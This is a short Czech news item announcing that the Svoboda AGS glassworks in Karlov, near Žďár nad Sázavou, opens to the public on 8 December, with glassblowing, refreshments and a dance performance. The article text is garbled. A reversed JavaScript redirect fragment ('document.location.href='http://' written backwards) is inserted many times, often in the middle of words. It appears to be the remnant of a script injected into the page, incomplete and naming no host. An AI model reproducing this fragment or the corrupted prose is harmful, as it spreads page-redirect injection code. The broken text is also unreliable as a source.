Rainbow page separator

Karlovská sklárna se v sobotu 8. prosince otevře veřejnosti

Úterý, 4. prosince 2018

Karlov / Na setkání bývalých pracovníků, ale nejenom těch, zve sklárna Svoboda AGS z Karlova, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti oficiálního otevření nové galerie v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách sklářské hutě v Karlově. To se uskuteční v sobotu 8. prosince od 7 hodin. Už časně ráno budou připraveni skláři, kteří zájemcům pomohou vyzkoušet si tvarování žhavé skloviny, aby si lidé svoje dílo po vychladnutí mohli odnést, případně jim bylo zasláno.
Po celý den bude v nabídce rovněž možnost občerstvení a od 11 hodin mohou pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomní sledovat vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení taneční skupiny Amirah z Havlíčkova Brodu.
Sklárna Jaroslava Svobody se nachází v Karlově u Žďáru nad Sázavou a vyrábí ručně tvarované hutnické sklo. Nabízí rovněž exkurze, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v pracovní dny od 6 do 13 hodin, kdy je možné sledovat sklářské mistry při práci. Navštívit se dá nejenom huť, ale i vzorkovna čítající více než 1500 exponátů.